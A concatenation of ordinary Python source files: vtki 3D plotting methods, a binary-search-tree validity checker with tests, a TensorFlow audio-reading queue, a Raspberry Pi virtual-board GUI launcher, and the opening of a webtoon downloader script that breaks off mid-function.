self.remove_actor(self.scalar_bar, reset_camera=False)
def add_point_labels(self, points, labels, italic=False, bold=True,
font_size=None, text_color='k',
font_family=None, shadow=False,
show_points=True, point_color='k', point_size=5,
name=None):
"""
Creates a point actor with one label from list labels assigned to
each point.
Parameters
----------
points : np.ndarray
n x 3 numpy array of points.
labels : list
List of labels. Must be the same length as points.
italic : bool, optional
Italicises the labels. Default False.
bold : bool, optional
Bolds the labels. Default True.
font_size : float, optional
Sets the size of the label font. Defaults to 16.
text_color : string or 3 item list, optional, defaults to black
Color of text.
Either a string, rgb list, or hex color string. For example:
text_color='white'
text_color='w'
text_color=[1, 1, 1]
text_color='#FFFFFF'
font_family : string, optional
Font family. Must be either courier, times, or arial.
shadow : bool, optional
Adds a black shadow to the text. Defaults to False
show_points : bool, optional
Controls if points are visible. Default True
point_color : string or 3 item list, optional, defaults to black
Color of points (if visible).
Either a string, rgb list, or hex color string. For example:
point_color='white'
point_color='w'
point_color=[1, 1, 1]
point_color='#FFFFFF'
point_size : float, optional
Size of points (if visible)
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
Returns
-------
labelMapper : vtk.vtkLabeledDataMapper
VTK label mapper. Can be used to change properties of the labels.
"""
if font_family is None:
font_family = rcParams['font']['family']
if font_size is None:
font_size = rcParams['font']['size']
if len(points) != len(labels):
raise Exception('There must be one label for each point')
vtkpoints = vtki.PolyData(points)
vtklabels = vtk.vtkStringArray()
vtklabels.SetName('labels')
for item in labels:
vtklabels.InsertNextValue(str(item))
vtkpoints.GetPointData().AddArray(vtklabels)
# create label mapper
labelMapper = vtk.vtkLabeledDataMapper()
labelMapper.SetInputData(vtkpoints)
textprop = labelMapper.GetLabelTextProperty()
textprop.SetItalic(italic)
textprop.SetBold(bold)
textprop.SetFontSize(font_size)
textprop.SetFontFamily(parse_font_family(font_family))
textprop.SetColor(parse_color(text_color))
textprop.SetShadow(shadow)
labelMapper.SetLabelModeToLabelFieldData()
labelMapper.SetFieldDataName('labels')
labelActor = vtk.vtkActor2D()
labelActor.SetMapper(labelMapper)
# add points
if show_points:
style = 'points'
else:
style = 'surface'
self.add_mesh(vtkpoints, style=style, color=point_color,
point_size=point_size)
self.add_actor(labelActor, reset_camera=False, name=name)
return labelMapper
def add_points(self, points, **kwargs):
""" Add points to a mesh """
kwargs['style'] = 'points'
self.add_mesh(points, **kwargs)
def add_arrows(self, cent, direction, mag=1, **kwargs):
""" Adds arrows to plotting object """
direction = direction.copy()
if cent.ndim != 2:
cent = cent.reshape((-1, 3))
if direction.ndim != 2:
direction = direction.reshape((-1, 3))
direction[:,0] *= mag
direction[:,1] *= mag
direction[:,2] *= mag
pdata = vtki.vector_poly_data(cent, direction)
# Create arrow object
arrow = vtk.vtkArrowSource()
arrow.Update()
glyph3D = vtk.vtkGlyph3D()
glyph3D.SetSourceData(arrow.GetOutput())
glyph3D.SetInputData(pdata)
glyph3D.SetVectorModeToUseVector()
glyph3D.Update()
arrows = wrap(glyph3D.GetOutput())
return self.add_mesh(arrows, **kwargs)
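# A minimal usage sketch for ``add_arrows`` (values are illustrative and
# assume numpy is imported as np elsewhere in this module):
# >>> cent = np.random.random((10, 3))
# >>> direction = np.random.random((10, 3))
# >>> plotter = vtki.Plotter()
# >>> _ = plotter.add_arrows(cent, direction, mag=2)
# >>> plotter.show()  # doctest:+SKIP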
@staticmethod
def _save_image(image, filename, return_img=None):
"""Internal helper for saving a NumPy image array"""
if not image.size:
raise Exception('Empty image. Have you run plot() first?')
# write screenshot to file
if isinstance(filename, str):
if isinstance(vtki.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(vtki.FIGURE_PATH, filename)
if not return_img:
return imageio.imwrite(filename, image)
imageio.imwrite(filename, image)
return image
def screenshot(self, filename=None, transparent_background=False,
return_img=None, window_size=None):
"""
Takes screenshot at current camera position
Parameters
----------
filename : str, optional
Location to write image to. If None, no image is written.
transparent_background : bool, optional
Makes the background transparent. Default False.
return_img : bool, optional
If a string filename is given and this is true, a NumPy array of
the image will be returned.
Returns
-------
img : numpy.ndarray
Array containing pixel RGB and alpha. Sized:
[Window height x Window width x 3] for transparent_background=False
[Window height x Window width x 4] for transparent_background=True
Examples
--------
>>> import vtki
>>> sphere = vtki.Sphere()
>>> plotter = vtki.Plotter()
>>> actor = plotter.add_mesh(sphere)
>>> plotter.screenshot('screenshot.png') # doctest:+SKIP
"""
if window_size is not None:
self.window_size = window_size
# configure image filter
self.image_transparent_background = transparent_background
# This if statement allows you to save screenshots of closed plotters
# This is needed for the sphinx-gallery work
if not hasattr(self, 'ren_win'):
# If plotter has been closed...
# check if last_image exists
if hasattr(self, 'last_image'):
# Save last image
return self._save_image(self.last_image, filename, return_img)
# Plotter hasn't been rendered or was improperly closed
raise AttributeError('This plotter is unable to save a screenshot.')
if isinstance(self, Plotter):
# TODO: we need a consistent rendering function
self.render()
else:
self._render()
# debug: this needs to be called twice for some reason,
img = self.image
img = self.image
return self._save_image(img, filename, return_img)
def add_legend(self, labels=None, bcolor=(0.5, 0.5, 0.5), border=False,
size=None, name=None):
"""
Adds a legend to render window. Entries must be a list
containing one string and color entry for each item.
Parameters
----------
labels : list, optional
When set to None, uses existing labels as specified by
- add_mesh
- add_lines
- add_points
List containing one entry for each item to be added to the
legend. Each entry must contain two strings, [label,
color], where label is the name of the item to add, and
color is the color of the label to add.
bcolor : list or string, optional
Background color, either a three item 0 to 1 RGB color
list, or a matplotlib color string (e.g. 'w' or 'white'
for a white color). If None, legend background is
disabled.
border : bool, optional
Controls if there will be a border around the legend.
Default False.
size : list, optional
Two float list, each float between 0 and 1. For example
[0.1, 0.1] would make the legend 10% the size of the
entire figure window.
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
Returns
-------
legend : vtk.vtkLegendBoxActor
Actor for the legend.
Examples
--------
>>> import vtki
>>> from vtki import examples
>>> mesh = examples.load_hexbeam()
>>> othermesh = examples.load_uniform()
>>> plotter = vtki.Plotter()
>>> _ = plotter.add_mesh(mesh, label='My Mesh')
>>> _ = plotter.add_mesh(othermesh, 'k', label='My Other Mesh')
>>> _ = plotter.add_legend()
>>> plotter.show() # doctest:+SKIP
Alternative manual example
>>> import vtki
>>> from vtki import examples
>>> mesh = examples.load_hexbeam()
>>> othermesh = examples.load_uniform()
>>> legend_entries = []
>>> legend_entries.append(['My Mesh', 'w'])
>>> legend_entries.append(['My Other Mesh', 'k'])
>>> plotter = vtki.Plotter()
>>> _ = plotter.add_mesh(mesh)
>>> _ = plotter.add_mesh(othermesh, 'k')
>>> _ = plotter.add_legend(legend_entries)
>>> plotter.show() # doctest:+SKIP
"""
self.legend = vtk.vtkLegendBoxActor()
if labels is None:
# use existing labels
if not self._labels:
raise Exception('No labels input.\n\n' +
'Add labels to individual items when adding them to ' +
'the plotting object with the "label=" parameter, ' +
'or enter them as the "labels" parameter.')
self.legend.SetNumberOfEntries(len(self._labels))
for i, (vtk_object, text, color) in enumerate(self._labels):
self.legend.SetEntry(i, vtk_object, text, parse_color(color))
else:
self.legend.SetNumberOfEntries(len(labels))
legendface = single_triangle()
for i, (text, color) in enumerate(labels):
self.legend.SetEntry(i, legendface, text, parse_color(color))
if size:
self.legend.SetPosition2(size[0], size[1])
if bcolor is None:
self.legend.UseBackgroundOff()
else:
self.legend.UseBackgroundOn()
self.legend.SetBackgroundColor(bcolor)
if border:
self.legend.BorderOn()
else:
self.legend.BorderOff()
# Add to renderer
self.add_actor(self.legend, reset_camera=False, name=name)
return self.legend
@property
def camera_position(self):
""" Returns camera position of the active render window """
return self.renderer.camera_position
@camera_position.setter
def camera_position(self, camera_location):
""" Set camera position of the active render window """
self.renderer.camera_position = camera_location
def reset_camera(self):
"""
Reset camera so it slides along the vector defined from camera
position to focal point until all of the actors can be seen.
"""
self.renderer.reset_camera()
self._render()
def isometric_view(self):
"""DEPRECATED: Please use ``view_isometric``"""
return self.view_isometric()
def view_isometric(self):
"""
Resets the camera to a default isometric view showing all the
actors in the scene.
"""
return self.renderer.view_isometric()
def view_vector(self, vector, viewup=None):
"""View the scene from the direction of the given vector"""
return self.renderer.view_vector(vector, viewup=viewup)
def view_xy(self, negative=False):
"""View the XY plane"""
return self.renderer.view_xy(negative=negative)
def view_xz(self, negative=False):
"""View the XZ plane"""
return self.renderer.view_xz(negative=negative)
def view_yz(self, negative=False):
"""View the YZ plane"""
return self.renderer.view_yz(negative=negative)
def disable(self):
"""Disable this renderer's camera from being interactive"""
return self.renderer.disable()
def enable(self):
"""Enable this renderer's camera to be interactive"""
return self.renderer.enable()
def set_background(self, color, loc='all'):
"""
Sets background color
Parameters
----------
color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
loc : int, tuple, list, or str, optional
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. If ``loc='all'`` then all
render windows will have their background set.
"""
if color is None:
color = rcParams['background']
if isinstance(color, str):
if color.lower() in ('paraview', 'pv'):
# Use the default ParaView background color
color = PV_BACKGROUND
else:
color = vtki.string_to_rgb(color)
if loc == 'all':
for renderer in self.renderers:
renderer.SetBackground(color)
else:
renderer = self.renderers[self.loc_to_index(loc)]
renderer.SetBackground(color)
@property
def background_color(self):
""" Returns background color of the first render window """
return self.renderers[0].GetBackground()
@background_color.setter
def background_color(self, color):
""" Sets the background color of all the render windows """
self.set_background(color)
def remove_legend(self):
""" Removes legend actor """
if hasattr(self, 'legend'):
self.remove_actor(self.legend, reset_camera=False)
self._render()
def enable_cell_picking(self, mesh=None, callback=None):
"""
Enables picking of cells. Press "r" to enable rectangle-based
selection. Press "r" again to turn it off. Selection will be
saved to self.picked_cells.
Uses last input mesh for input
Parameters
----------
mesh : vtk.UnstructuredGrid, optional
UnstructuredGrid grid to select cells from. Uses last
input grid by default.
callback : function, optional
When input, calls this function after a selection is made.
The picked_cells are input as the first parameter to this function.
"""
if mesh is None:
if not hasattr(self, 'mesh'):
raise Exception('Input a mesh into the Plotter class first '
+ 'or set it in this function')
mesh = self.mesh
def pick_call_back(picker, event_id):
extract = vtk.vtkExtractGeometry()
mesh.cell_arrays['orig_extract_id'] = np.arange(mesh.n_cells)
extract.SetInputData(mesh)
extract.SetImplicitFunction(picker.GetFrustum())
extract.Update()
self.picked_cells = vtki.wrap(extract.GetOutput())
if callback is not None:
callback(self.picked_cells)
area_picker = vtk.vtkAreaPicker()
area_picker.AddObserver(vtk.vtkCommand.EndPickEvent, pick_call_back)
self.enable_rubber_band_style()
self.iren.SetPicker(area_picker)
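# Usage sketch for cell picking (interactive; press "r", then drag a
# rectangle over the mesh; ``grid`` stands for any previously added dataset):
# >>> plotter = vtki.Plotter()
# >>> _ = plotter.add_mesh(grid)
# >>> plotter.enable_cell_picking(callback=lambda cells: print(cells.n_cells))
# >>> plotter.show()  # doctest:+SKIP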
def generate_orbital_path(self, factor=3., n_points=20, viewup=None, z_shift=None):
"""Genrates an orbital path around the data scene
Parameters
----------
factor : float
A scaling factor when building the orbital extent
n_points : int
number of points on the orbital path
viewup : list(float)
the normal to the orbital plane
z_shift : float, optional
shift the plane up/down from the center of the scene by this amount
"""
if viewup is None:
viewup = rcParams['camera']['viewup']
center = list(self.center)
bnds = list(self.bounds)
if z_shift is None:
z_shift = (bnds[5] - bnds[4]) * factor
center[2] = center[2] + z_shift
radius = (bnds[1] - bnds[0]) * factor
y = (bnds[3] - bnds[2]) * factor
if y > radius:
radius = y
return vtki.Polygon(center=center, radius=radius, normal=viewup, n_sides=n_points)
def fly_to(self, point):
"""Given a position point, move the current camera's focal point to that
point. The movement is animated over the number of frames specified in
NumberOfFlyFrames. The LOD desired frame rate is used.
"""
return self.iren.FlyTo(self.renderer, *point)
def orbit_on_path(self, path=None, focus=None, step=0.5, viewup=None, bkg=True):
"""Orbit on the given path focusing on the focus point
Parameters
----------
path : vtki.PolyData
Path of orbital points. The order in the points is the order of
travel
focus : list(float) of length 3, optional
The point to focus the camera on.
step : float, optional
The timestep between flying to each camera position
viewup : list(float)
the normal to the orbital plane
"""
if focus is None:
focus = self.center
if viewup is None:
viewup = rcParams['camera']['viewup']
if path is None:
path = self.generate_orbital_path(viewup=viewup)
if not is_vtki_obj(path):
path = vtki.PolyData(path)
points = path.points
def orbit():
"""Internal thread for running the orbit"""
for point in points:
self.set_position(point)
self.set_focus(focus)
self.set_viewup(viewup)
time.sleep(step)
if bkg:
thread = Thread(target=orbit)
thread.start()
else:
orbit()
return
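# Sketch of generating and flying an orbital path around the current scene
# (values are illustrative; ``mesh`` is any dataset already added):
# >>> plotter = vtki.Plotter()
# >>> _ = plotter.add_mesh(mesh)
# >>> path = plotter.generate_orbital_path(n_points=36, factor=2.0)
# >>> plotter.orbit_on_path(path, step=0.1, bkg=False)  # doctest:+SKIP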
def export_vtkjs(self, filename, compress_arrays=False):
"""
Export the current rendering scene as a VTKjs scene for
rendering in a web browser
"""
if not hasattr(self, 'ren_win'):
raise RuntimeError('Export must be called before showing/closing the scene.')
if isinstance(vtki.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(vtki.FIGURE_PATH, filename)
return export_plotter_vtkjs(self, filename, compress_arrays=compress_arrays)
class Plotter(BasePlotter):
""" Plotting object to display vtk meshes or numpy arrays.
Example
-------
>>> import vtki
>>> from vtki import examples
>>> mesh = examples.load_hexbeam()
>>> another_mesh = examples.load_uniform()
>>> plotter = vtki.Plotter()
>>> _ = plotter.add_mesh(mesh, color='red')
>>> _ = plotter.add_mesh(another_mesh, color='blue')
>>> plotter.show() # doctest:+SKIP
Parameters
----------
off_screen : bool, optional
Renders off screen when False. Useful for automated screenshots.
notebook : bool, optional
When True, the resulting plot is placed inline in a Jupyter notebook.
Assumes a jupyter console is active. Automatically enables off_screen.
shape : list or tuple, optional
Number of sub-render windows inside of the main window.
Specify two across with ``shape=(2, 1)`` and a two by two grid
with ``shape=(2, 2)``. By default there is only one render
window.
border : bool, optional
Draw a border around each render window. Default False.
border_color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
window_size : list, optional
Window size in pixels. Defaults to [1024, 768]
"""
last_update_time = 0.0
q_pressed = False
right_timer_id = -1
def __init__(self, off_screen=None, notebook=None, shape=(1, 1),
border=None, border_color='k', border_width=1.0,
window_size=None):
"""
Initialize a vtk plotting object
"""
super(Plotter, self).__init__(shape=shape, border=border,
border_color=border_color,
border_width=border_width)
log.debug('Initializing')
def on_timer(iren, event_id):
""" Exit application if interactive renderer stops """
if event_id == 'TimerEvent':
self.iren.TerminateApp()
if off_screen is None:
off_screen = vtki.OFF_SCREEN
if notebook is None:
if run_from_ipython():
try:
notebook = type(get_ipython()).__module__.startswith('ipykernel.')
except NameError:
pass
self.notebook = notebook
if self.notebook:
off_screen = True
self.off_screen = off_screen
if window_size is None:
window_size = vtki.rcParams['window_size']
# initialize render window
self.ren_win = vtk.vtkRenderWindow()
self.ren_win.SetBorders(True)
for renderer in self.renderers:
self.ren_win.AddRenderer(renderer)
if self.off_screen:
self.ren_win.SetOffScreenRendering(1)
else: # Allow user to interact
self.iren = vtk.vtkRenderWindowInteractor()
self.iren.LightFollowCameraOff()
self.iren.SetDesiredUpdateRate(30.0)
self.iren.SetRenderWindow(self.ren_win)
self.enable_trackball_style()
self.iren.AddObserver("KeyPressEvent", self.key_press_event)
self.update_style()
# for renderer in self.renderers:
# self.iren.SetRenderWindow(renderer)
# Set background
self.set_background(rcParams['background'])
# Set window size
self.window_size = window_size
# add timer event if interactive render exists
if hasattr(self, 'iren'):
self.iren.AddObserver(vtk.vtkCommand.TimerEvent, on_timer)
def show(self, title=None, window_size=None, interactive=True,
auto_close=True, interactive_update=False, full_screen=False,
screenshot=False, return_img=False, use_panel=None):
"""
Creates plotting window
Parameters
----------
title : string, optional
Title of plotting window.
window_size : list, optional
Window size in pixels. Defaults to [1024, 768]
interactive : bool, optional
Enabled by default. Allows user to pan and move figure.
auto_close : bool, optional
Enabled by default. Exits the plotting session when the user
closes the window while interactive is True.
interactive_update: bool, optional
Disabled by default. Allows the user to draw without blocking;
the user should call Update() in each iteration.
full_screen : bool, optional
Opens window in full screen. When enabled, ignores
window_size. Default False.
use_panel : bool, optional
If False, the interactive rendering from panel will not be used in
notebooks
Returns
-------
cpos : list
List of camera position, focal point, and view up
"""
if use_panel is None:
use_panel = rcParams['use_panel']
# reset the camera on the first render unless the camera is already set
if self.first_time: # and not self.camera_set:
for renderer in self.renderers:
if not renderer.camera_set:
renderer.camera_position = renderer.get_default_cam_pos()
renderer.ResetCamera()
self.first_time = False
if title:
self.ren_win.SetWindowName(title)
if full_screen:
self.ren_win.SetFullScreen(True)
self.ren_win.BordersOn() # super buggy when disabled
else:
if window_size is None:
window_size = self.window_size
self.ren_win.SetSize(window_size[0], window_size[1])
# Render
log.debug('Rendering')
self.ren_win.Render()
if interactive and (not self.off_screen):
try: # interrupts will be caught here
log.debug('Starting iren')
self.update_style()
self.iren.Initialize()
if not interactive_update:
self.iren.Start()
except KeyboardInterrupt:
log.debug('KeyboardInterrupt')
self.close()
raise KeyboardInterrupt
# Keep track of image for sphinx-gallery
self.last_image = self.screenshot(screenshot, return_img=True)
# Get camera position before closing
cpos = self.camera_position
if self.notebook:
# sanity check
try:
import IPython
except ImportError:
raise Exception('Install IPython to display image in a notebook')
disp = None
if use_panel:
try:
from panel.pane import VTK as panel_display
disp = panel_display(self.ren_win, sizing_mode='stretch_width',
height=400)
except:
pass
if disp is None or self.shape != (1,1):
import PIL.Image
disp = IPython.display.display(PIL.Image.fromarray(self.last_image))
if auto_close:
self.close()
if self.notebook:
return disp
if return_img or screenshot == True:
return cpos, self.last_image
return cpos
def plot(self, *args, **kwargs):
""" Present for backwards compatibility. Use `show()` instead """
return self.show(*args, **kwargs)
def render(self):
""" renders main window """
self.ren_win.Render()
def single_triangle():
""" A single PolyData triangle """
points = np.zeros((3, 3))
points[1] = [1, 0, 0]
points[2] = [0.5, 0.707, 0]
cells = np.array([[3, 0, 1, 2]], ctypes.c_long)
return vtki.PolyData(points, cells)
def parse_color(color):
""" Parses color into a vtk friendly rgb list """
if color is None:
color = rcParams['color']
if isinstance(color, str):
return vtki.string_to_rgb(color)
elif len(color) == 3:
return color
else:
raise Exception("""
Invalid color input
Must be a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'""")
def parse_font_family(font_family):
""" checks font name """
# check font name
font_family = font_family.lower()
if font_family not in ['courier', 'times', 'arial']:
raise Exception('Font must be either "courier", "times" ' +
'or "arial"')
return FONT_KEYS[font_family]
def plot_compare_four(data_a, data_b, data_c, data_d, display_kwargs=None,
plotter_kwargs=None, show_kwargs=None, screenshot=None,
camera_position=None, outline=None, outline_color='k',
labels=('A', 'B', 'C', 'D')):
"""Plot a 2 by 2 comparison of data objects. Plotting parameters and camera
positions will all be the same.
"""
datasets = [[data_a, data_b], [data_c, data_d]]
labels = [labels[0:2], labels[2:4]]
if plotter_kwargs is None:
plotter_kwargs = {}
if display_kwargs is None:
display_kwargs = {}
if show_kwargs is None:
show_kwargs = {}
p = vtki.Plotter(shape=(2,2), **plotter_kwargs)
for i in range(2):
for j in range(2):
p.subplot(i, j)
p.add_mesh(datasets[i][j], **display_kwargs)
p.add_text(labels[i][j])
if is_vtki_obj(outline):
p.add_mesh(outline, color=outline_color)
if camera_position is not None:
p.camera_position = camera_position
return p.show(screenshot=screenshot, **show_kwargs)
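# A minimal usage sketch for ``plot_compare_four`` (dataset and filter
# choices are illustrative; assumes the vtki ``examples`` module is available):
# >>> import vtki
# >>> from vtki import examples
# >>> mesh = examples.load_uniform()
# >>> cpos = plot_compare_four(mesh, mesh.contour(), mesh.slice(),
# ...                          mesh.threshold(),
# ...                          labels=('Input', 'Contour', 'Slice', 'Threshold'))  # doctest:+SKIP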
|
solution.py
|
# python3
from abc import ABC
from collections import namedtuple
from sys import setrecursionlimit, stdin
from threading import stack_size, Thread
from typing import AnyStr, IO, List
from unittest import TestCase
setrecursionlimit(10 ** 6)
stack_size(2 ** 27)
border = namedtuple('border', 'left right')
test = namedtuple('test', 'input expected')
class TreeChecker:
def __init__(self):
self.n = 0
self.key = self.left = self.right = None
def read(self, src: IO):
self.n = int(src.readline())
self.key = [0 for _ in range(self.n)]
self.left = [0 for _ in range(self.n)]
self.right = [0 for _ in range(self.n)]
for i in range(self.n):
[self.key[i], self.left[i], self.right[i]] = map(int, src.readline().split())
return self
def check(self, node: int = 0, bound: border = border(-2 ** 31 - 1, 2 ** 31)) -> bool:
if self.n < 2:
return True
root = self.key[node]
left = self.left[node]
if left != -1:
if self.key[left] >= root:
return False
if self.key[left] < bound.left:
return False
if not self.check(left, border(bound.left, root)):
return False
right = self.right[node]
if right != -1:
if self.key[right] < root:
return False
if self.key[right] >= bound.right:
return False
if not self.check(right, border(root, bound.right)):
return False
return True
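# Worked illustration of the bound narrowing in ``check`` (the rows below use
# the same "key left right" format as read(); the Fake helper is defined below):
# >>> TreeChecker().read(Fake(['2 1 2', '1 -1 -1', '3 -1 -1'])).check()
# True
# Node 0 (key 2) is checked against (-2**31 - 1, 2**31), its left child
# (key 1) against (-2**31 - 1, 2), and its right child (key 3) against
# (2, 2**31); equal keys are only allowed in the right subtree.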
class Fake(IO, ABC):
def __init__(self, rows: List[str]):
self.__i = -1
self.__rows = [str(len(rows))] + rows
def readline(self, limit: int = -1) -> AnyStr:
self.__i += 1
return self.__rows[self.__i]
class Test(TestCase):
def test_tree_checker(self):
tests = [
# samples
test([
'2 1 2',
'1 -1 -1',
'3 -1 -1',
], True),
test([
'1 1 2',
'2 -1 -1',
'3 -1 -1',
], False),
test([
'2 1 2',
'1 -1 -1',
'2 -1 -1',
], True),
test([
'2 1 2',
'2 -1 -1',
'3 -1 -1',
], False),
test([], True),
test(['2147483647 -1 -1'], True),
test([
'1 -1 1',
'2 -1 2',
'3 -1 3',
'4 -1 4',
'5 -1 -1',
], True),
test([
'4 1 2',
'2 3 4',
'6 5 6',
'1 -1 -1',
'3 -1 -1',
'5 -1 -1',
'7 -1 -1',
], True),
# additional
test([
'4 1 -1',
'2 -1 2',
'4 -1 -1',
], False),
]
for i, t in enumerate(tests):
src = Fake(t.input)
self.assertEqual(t.expected, TreeChecker().read(src).check(), msg='at {} position'.format(i))
def main():
print('CORRECT') if TreeChecker().read(stdin).check() else print('INCORRECT')
if __name__ == '__main__':
Thread(target=main).start()
|
audio_reader.py
|
import fnmatch
import os
import random
import re
import threading
import librosa
import numpy as np
import tensorflow as tf
FILE_PATTERN = r'p([0-9]+)_([0-9]+)\.wav'
def get_category_cardinality(files):
id_reg_expression = re.compile(FILE_PATTERN)
min_id = None
max_id = None
for filename in files:
matches = id_reg_expression.findall(filename)[0]
id, recording_id = [int(id_) for id_ in matches]
if min_id is None or id < min_id:
min_id = id
if max_id is None or id > max_id:
max_id = id
return min_id, max_id
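# Illustration with hypothetical file names that match FILE_PATTERN:
# >>> get_category_cardinality(['p225_001.wav', 'p226_003.wav'])
# (225, 226)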
def randomize_files(files):
for file in files:
file_index = random.randint(0, (len(files) - 1))
yield files[file_index]
def find_files(directory, pattern='*.wav'):
'''Recursively finds all files matching the pattern.'''
files = []
for root, dirnames, filenames in os.walk(directory):
for filename in fnmatch.filter(filenames, pattern):
files.append(os.path.join(root, filename))
return files
def atoi(text):
return int(text) if text.isdigit() else text
def natural_keys(text):
'''
alist.sort(key=natural_keys) sorts in human order
http://nedbatchelder.com/blog/200712/human_sorting.html
(See Toothy's implementation in the comments)
'''
return [atoi(c) for c in re.split(r'(\d+)', text)]
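# Illustration:
# >>> natural_keys('p2_10.wav')
# ['p', 2, '_', 10, '.wav']
# so sorting with key=natural_keys places 'p2_10.wav' before 'p10_1.wav',
# unlike plain lexicographic order.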
def load_generic_audio(directory, sample_rate):
'''Generator that yields audio waveforms from the directory.'''
files = find_files(directory)
files.sort(key=natural_keys)
random.seed(232)
#index_shuf = range(len(files))
#shuffle(index_shuf)
#files = [files[i] for i in index_shuf]
random.shuffle(files)
#files.sort(key=natural_keys)
id_reg_exp = re.compile(FILE_PATTERN)
print("files length: {}".format(len(files)))
#randomized_files = randomize_files(files)
randomized_files = files
for filename in randomized_files:
ids = id_reg_exp.findall(filename)
if not ids:
# The file name does not match the pattern containing ids, so
# there is no id.
category_id = None
else:
# The file name matches the pattern for containing ids.
category_id = int(ids[0][0])
audio, _ = librosa.load(filename, sr=sample_rate, mono=True)
audio = audio.reshape(-1, 1)
yield audio, filename, category_id
def trim_silence(audio, threshold):
'''Removes silence at the beginning and end of a sample.'''
energy = librosa.feature.rmse(audio)
frames = np.nonzero(energy > threshold)
indices = librosa.core.frames_to_samples(frames)[1]
# Note: indices can be an empty array, if the whole audio was silence.
return audio[indices[0]:indices[-1]] if indices.size else audio[0:0]
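# Minimal sketch of the intended use on a (samples, 1) float array (this
# mirrors the commented-out call in AudioReader.thread_main below):
# audio = trim_silence(audio[:, 0], silence_threshold)
# audio = audio.reshape(-1, 1)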
def not_all_have_id(files):
''' Return true iff any of the filenames does not conform to the pattern
we require for determining the category id.'''
id_reg_exp = re.compile(FILE_PATTERN)
for file in files:
ids = id_reg_exp.findall(file)
if not ids:
return True
return False
class AudioReader(object):
'''Generic background audio reader that preprocesses audio files
and enqueues them into a TensorFlow queue.'''
def __init__(self,
audio_dir,
coord,
sample_rate,
gc_enabled,
receptive_field,
sample_size=None,
silence_threshold=None,
queue_size=32):
self.audio_dir = audio_dir
self.sample_rate = sample_rate
self.coord = coord
self.sample_size = sample_size
self.receptive_field = receptive_field
self.silence_threshold = silence_threshold
self.gc_enabled = gc_enabled
self.threads = []
self.sample_placeholder = tf.placeholder(dtype=tf.float32, shape=None)
self.queue = tf.PaddingFIFOQueue(queue_size,
['float32'],
shapes=[(None, 1)])
self.enqueue = self.queue.enqueue([self.sample_placeholder])
if self.gc_enabled:
self.id_placeholder = tf.placeholder(dtype=tf.int32, shape=())
self.gc_queue = tf.PaddingFIFOQueue(queue_size, ['int32'],
shapes=[()])
self.gc_enqueue = self.gc_queue.enqueue([self.id_placeholder])
# TODO Find a better way to check this.
# Checking inside the AudioReader's thread makes it hard to terminate
# the execution of the script, so we do it in the constructor for now.
files = find_files(audio_dir)
if not files:
raise ValueError("No audio files found in '{}'.".format(audio_dir))
if self.gc_enabled and not_all_have_id(files):
raise ValueError("Global conditioning is enabled, but file names "
"do not conform to pattern having id.")
# Determine the number of mutually-exclusive categories we will
# accommodate in our embedding table.
if self.gc_enabled:
_, self.gc_category_cardinality = get_category_cardinality(files)
# Add one to the largest index to get the number of categories,
# since tf.nn.embedding_lookup expects zero-indexing. This
# means one or more at the bottom correspond to unused entries
# in the embedding lookup table. But that's a small waste of memory
# to keep the code simpler, and preserves correspondence between
# the id one specifies when generating, and the ids in the
# file names.
self.gc_category_cardinality += 1
print("Detected --gc_cardinality={}".format(
self.gc_category_cardinality))
else:
self.gc_category_cardinality = None
def dequeue(self, num_elements):
output = self.queue.dequeue_many(num_elements)
return output
def dequeue_gc(self, num_elements):
return self.gc_queue.dequeue_many(num_elements)
def thread_main(self, sess):
stop = False
# Go through the dataset multiple times
#while not stop:
iterator = load_generic_audio(self.audio_dir, self.sample_rate)
for audio, filename, category_id in iterator:
print(filename)
if self.coord.should_stop():
stop = True
break
if self.silence_threshold is not None:
# Remove silence
#audio = trim_silence(audio[:, 0], self.silence_threshold)
#audio = audio.reshape(-1, 1)
if audio.size == 0:
print("Warning: {} was ignored as it contains only "
"silence. Consider decreasing trim_silence "
"threshold, or adjust volume of the audio."
.format(filename))
audio = np.pad(audio, [[self.receptive_field, 0], [0, 0]],
'constant')
if self.sample_size:
# Cut samples into pieces of size receptive_field +
# sample_size with receptive_field overlap
while len(audio) > self.receptive_field:
piece = audio[:(self.receptive_field +
self.sample_size), :]
sess.run(self.enqueue,
feed_dict={self.sample_placeholder: piece})
audio = audio[self.sample_size:, :]
if self.gc_enabled:
sess.run(self.gc_enqueue, feed_dict={
self.id_placeholder: category_id})
else:
sess.run(self.enqueue,
feed_dict={self.sample_placeholder: audio})
if self.gc_enabled:
sess.run(self.gc_enqueue,
feed_dict={self.id_placeholder: category_id})
def start_threads(self, sess, n_threads=1):
for _ in range(n_threads):
thread = threading.Thread(target=self.thread_main, args=(sess,))
thread.daemon = True # Thread will close when parent quits.
thread.start()
self.threads.append(thread)
return self.threads
|
virtualboard.py
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
# ## #############################################################
# virtualboard.py
#
# Author: Mauricio Matamoros
# Licence: MIT
# Date:
#
# ## #############################################################
# Future imports (Python 2.7 compatibility)
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from atexit import register
from threading import Thread
from board import Board
from tkinter import mainloop
import RPi.GPIO as GPIO
def exit_handler():
print('Shutting down board GUI')
if _async_board_thread:
_async_board_thread.join()
def _async_board_worker():
global _async_board_thread
board = Board()
board.connect(GPIO._io_pins)
try:
mainloop()
except:
pass
_async_board_thread = None
_async_board_thread = Thread(target=_async_board_worker)
register(exit_handler)
_async_board_thread.start()
|
main.py
|
import importlib
import logging
import os
import threading
import queue
import click
import requests
from webtoon_dl.providers import mapping, exceptions
from webtoon_dl.utils import parse_extension, sanitize_filename
_terminated = False
_total = 1
logger = logging.getLogger('logger')
formatter = logging.Formatter('[%(asctime)s] [%(levelname)s] %(message)s')
ch = logging.StreamHandler()
ch.setFormatter(formatter)
logger.addHandler(ch)
def worker(q):
tid = threading.get_ident()
while True:
job = q.get()
if job is None or _terminated:
logger.debug('[%d] Got termination signal; terminating...' % tid)
q.task_done()
